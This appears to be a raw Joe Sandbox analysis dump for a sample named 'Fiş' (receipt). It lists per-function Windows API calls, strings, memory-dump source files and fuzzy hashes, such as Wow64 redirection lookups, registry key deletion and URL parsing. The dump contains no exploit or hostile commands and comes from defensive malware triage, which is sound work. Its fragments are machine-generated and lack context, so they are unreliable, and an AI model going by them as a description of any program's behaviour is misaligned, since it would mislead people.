                                                        • Instruction ID: 28a11ecab1877f9e61a0b5246ce5425ac715ccf2dae631c571585757e1e5ede8
                                                        • Opcode Fuzzy Hash: 824835f95e3c672aac81d722a6b8d13fb3f774803021701ef83c8f68f0b54dd0
                                                        • Instruction Fuzzy Hash: 8E318E31104609AFDB218F34CC41BEA7BA9FB4A328F285729F975A72E0C771A855DB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E95190
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00E951C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: |$D
                                                        • API String ID: 1413715105-465884809
                                                        • Opcode ID: a8daea7ba3d2ee2561e67c38bd6367a1c8f0c2fa1fb8ec67da181b4e3f25713b
                                                        • Instruction ID: 306ea888edd87148509e10ad04d28372cabcd0ee721221ba79388049a2119a1f
                                                        • Opcode Fuzzy Hash: a8daea7ba3d2ee2561e67c38bd6367a1c8f0c2fa1fb8ec67da181b4e3f25713b
                                                        • Instruction Fuzzy Hash: 12315971801119ABCF01EFE1DC81AEEBFB8FF14700F101019E804B6166DA71AA06CBA4
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EAA15E
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EAA172
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EAA196
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: c367bca45957da87981ed0cab113a0eaeffb2765866760e0680ac632c5c3dc6c
                                                        • Instruction ID: 28dc89b0ea550f4931b03b2d16ce69c3463bf9a024823437033a4ff836b6f576
                                                        • Opcode Fuzzy Hash: c367bca45957da87981ed0cab113a0eaeffb2765866760e0680ac632c5c3dc6c
                                                        • Instruction Fuzzy Hash: 89219C72500218BBDF118F94CC42FEA3BA9EF4D724F151224FA55BB1D0D7B5A855CBA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EAA941
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EAA94F
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EAA956
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 61243cf512a3d10d72bed3a402533aeaf8e9eef9d0b36732c76bab162836f910
                                                        • Instruction ID: 7b50dfe938433ac144f6600bc4aedadfffc9fd9e44c394c137de1f0461fb27dc
                                                        • Opcode Fuzzy Hash: 61243cf512a3d10d72bed3a402533aeaf8e9eef9d0b36732c76bab162836f910
                                                        • Instruction Fuzzy Hash: 222181B560020AAFEB10DF14DC91DB737ADFB5A3A8B051069FA04AB261CB31EC15DA61
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EA9A30
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EA9A40
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EA9A65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 347f3d442f9fc14661e4dcf4319ea3930a9a1fdfedcc0f11c49a558d9d7bbcc7
                                                        • Instruction ID: 95e1d6c148ea6658ea8bfc48121b251f00b6b32f914a40a1823f7801a749d809
                                                        • Opcode Fuzzy Hash: 347f3d442f9fc14661e4dcf4319ea3930a9a1fdfedcc0f11c49a558d9d7bbcc7
                                                        • Instruction Fuzzy Hash: D621C532610118BFDB218F54CC85FBB3BAAEF8E764F019129F944AB191C671AC11C7A0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EAA46D
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EAA482
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EAA48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: a39fe0e485e8b39b1268231b1a89746071179ea1aa7a05319881524cfafef933
                                                        • Instruction ID: b9d58b0148a113e5c03695666229034fc56b31bcb0e1e9d379c6cb7a414aeb07
                                                        • Opcode Fuzzy Hash: a39fe0e485e8b39b1268231b1a89746071179ea1aa7a05319881524cfafef933
                                                        • Instruction Fuzzy Hash: 6E11C471200308BEEF205F65CC45FAB3BA9EF8D768F055128FA55AA091D3B2E811D720
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E62350,?), ref: 00E622A1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E622A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 2574300362-340411864
                                                        • Opcode ID: 5f500bdf38f024808243dec464ff09691616b3c4e4401c34a23d0fe94645fa29
                                                        • Instruction ID: 89fcfddd51b3cd79104a11adf76cff6dd49124268f62f9247d6eebaf9d543b70
                                                        • Opcode Fuzzy Hash: 5f500bdf38f024808243dec464ff09691616b3c4e4401c34a23d0fe94645fa29
                                                        • Instruction Fuzzy Hash: CBE09A70698305AFDB505F72EE49F653669B74074AF109038B206F50B0DFB7445ADF54
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E62276), ref: 00E62376
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E6237D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 2574300362-2819208100
                                                        • Opcode ID: e89c6b9810b6c67d8c09878c22e6ed0db68a557ac10be7c54a012c97da2c66c6
                                                        • Instruction ID: fb156423d0245db04f80d61bb5854f5526e16db723990cd083ac51038ceb3835
                                                        • Opcode Fuzzy Hash: e89c6b9810b6c67d8c09878c22e6ed0db68a557ac10be7c54a012c97da2c66c6
                                                        • Instruction Fuzzy Hash: 29E0BDB0689309AFDB206F62FE0DF143A65B744706F145438F209F61B0CFBB940AEA14
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 64de5d845cbd92e9e30a87514f6221c4b0cb5203a061d93282ed31e398883431
                                                        • Instruction ID: 08f18126a079c0dd782a779f95760501871ae16fbf40fa2223a4c22d6347b0c6
                                                        • Opcode Fuzzy Hash: 64de5d845cbd92e9e30a87514f6221c4b0cb5203a061d93282ed31e398883431
                                                        • Instruction Fuzzy Hash: 9DE0ECB180861CDBCE1197509D05DFBB7BCA704741F5824F2B906B1010E6359B88AE22
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E442EC,?,00E442AA,?), ref: 00E44304
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E44316
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 0c01e92bcbb05300a88d14d62542f36406d5725c0ddbfd360080edc2f0271589
                                                        • Instruction ID: 9290adcbadf2eedfbb3bcacc3515e63260ddd12854fe75436b194ee3abd9035d
                                                        • Opcode Fuzzy Hash: 0c01e92bcbb05300a88d14d62542f36406d5725c0ddbfd360080edc2f0271589
                                                        • Instruction Fuzzy Hash: 1DD0A7B0904712DFC7204F31FC0CB1177D4AB04705B14543DF641F21A4D7B1D8848610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EA21FB,?,00EA23EF), ref: 00EA2213
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00EA2225
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetProcessId$kernel32.dll
                                                        • API String ID: 2574300362-399901964
                                                        • Opcode ID: 3a286aa5ec64904432b8dc0abcb67162acdaa52fb5682fbfca7e531cfb0db645
                                                        • Instruction ID: 1a486609cd51ef5db8fd2b922d51f3e7f58da416665d3f4fa1f114c9492528f6
                                                        • Opcode Fuzzy Hash: 3a286aa5ec64904432b8dc0abcb67162acdaa52fb5682fbfca7e531cfb0db645
                                                        • Instruction Fuzzy Hash: A2D0A7748047169FD7215F35FC08B1277D9EB09304B14643DEA41F21A0D772E8848760
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00E441BB,00E44341,?,00E4422F,?,00E441BB,?,?,?,?,00E439FE,?,00000001), ref: 00E44359
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E4436B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 9abb98dd71735d0ffb0629f2c54f64ca927d11841f67fddb37a4f9955d5835bc
                                                        • Instruction ID: b8a324edf4d87d44f1af1963e9baf33b122281b90ec8b179d91d009daa9d7372
                                                        • Opcode Fuzzy Hash: 9abb98dd71735d0ffb0629f2c54f64ca927d11841f67fddb37a4f9955d5835bc
                                                        • Instruction Fuzzy Hash: E1D0A7709047129FC7204F31FC09B1177D4AB10B19B14D43DE581F2190D7B2D8848610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00E8052F,?,00E806D7), ref: 00E80572
                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E80584
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1587604923
                                                        • Opcode ID: f75ef4c3082c014b54cb1acc2af262cbe46a6d2ab4907f3431216e14dcafbe18
                                                        • Instruction ID: 9d45c29fca33e78c2938d4b5e59914bf890521da13803a2d8a246fe4ea181718
                                                        • Opcode Fuzzy Hash: f75ef4c3082c014b54cb1acc2af262cbe46a6d2ab4907f3431216e14dcafbe18
                                                        • Instruction Fuzzy Hash: 0DD05E315153129EC720AF21AC08A1277E4AB04304B14943DEA49B2554D772C4888B20
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00E8051D,?,00E805FE), ref: 00E80547
                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E80559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1071820185
                                                        • Opcode ID: 6ee113f67d03a9e1256d0f01ca0323ad1c43d25025231b209e2cc400735eaa72
                                                        • Instruction ID: a5a92406274d4eed3e26f886487c90b49b53eab5df2a70405c028aae61f72e1b
                                                        • Opcode Fuzzy Hash: 6ee113f67d03a9e1256d0f01ca0323ad1c43d25025231b209e2cc400735eaa72
                                                        • Instruction Fuzzy Hash: 35D0A7315147129FC7309F21EC08A1177E4AB00305B14D43DE55EF2150E772C8888B20
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E9ECBE,?,00E9EBBB), ref: 00E9ECD6
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E9ECE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: ae05a5663c8415b216a3179a5092e97226c4b9a4acc09b109ca255a5f1b92d9f
                                                        • Instruction ID: 57c3dfe050ab70b0d2c3a9acf7f45e540e35f4825787c74740027064f4033397
                                                        • Opcode Fuzzy Hash: ae05a5663c8415b216a3179a5092e97226c4b9a4acc09b109ca255a5f1b92d9f
                                                        • Instruction Fuzzy Hash: 6CD0A7708047239FCF249F61EC48B12B7E4AB00304B14983DFA95F2290EB71C8C48610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E9BAD3,00000001,00E9B6EE,?,00EDDC00), ref: 00E9BAEB
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E9BAFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 6a9b4c5dd10fc49599d92627438901d655cf0ed4a7e23c4873ad38979b0f7eef
                                                        • Instruction ID: 6056f8065cbe54b6772a4515bac45ffbcc79bec973fcb401b8bad0b5974ea5bb
                                                        • Opcode Fuzzy Hash: 6a9b4c5dd10fc49599d92627438901d655cf0ed4a7e23c4873ad38979b0f7eef
                                                        • Instruction Fuzzy Hash: 0CD05EB0C047129FCB305F21BC48A2276D4AB00304B145439A943F2194EB71C884C610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00EA3BD1,?,00EA3E06), ref: 00EA3BE9
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EA3BFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 4983fd12a7a97f167cbbb81dc512f12de7a5d03ba0f618d8608205280db93843
                                                        • Instruction ID: 37eb6047279ae0d66dd27a382c17c4e631b326c18e43cffc9dae21a6b0d7f1e0
                                                        • Opcode Fuzzy Hash: 4983fd12a7a97f167cbbb81dc512f12de7a5d03ba0f618d8608205280db93843
                                                        • Instruction Fuzzy Hash: 50D0A7B04047169FC7205F71EC09A13FAF4AB07328B165439F445F2190E6B1D4848E20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0321d2afcbb54b1bf2942ce4fd2ec3c3370dd75f271f49b583ba737d95ce971
                                                        • Instruction ID: 0ed3a3d1db23f34777b43f9c221811db99a61edd9858094fad6a802d9a3be317
                                                        • Opcode Fuzzy Hash: b0321d2afcbb54b1bf2942ce4fd2ec3c3370dd75f271f49b583ba737d95ce971
                                                        • Instruction Fuzzy Hash: 87C14B75A0021AEFDF15CFA4C884EAEB7B5FF48714F109598E909AB252D730EE41DB90
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00E9AAB4
                                                        • CoUninitialize.OLE32 ref: 00E9AABF
                                                          • Part of subcall function 00E80213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8027B
                                                        • VariantInit.OLEAUT32(?), ref: 00E9AACA
                                                        • VariantClear.OLEAUT32(?), ref: 00E9AD9D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
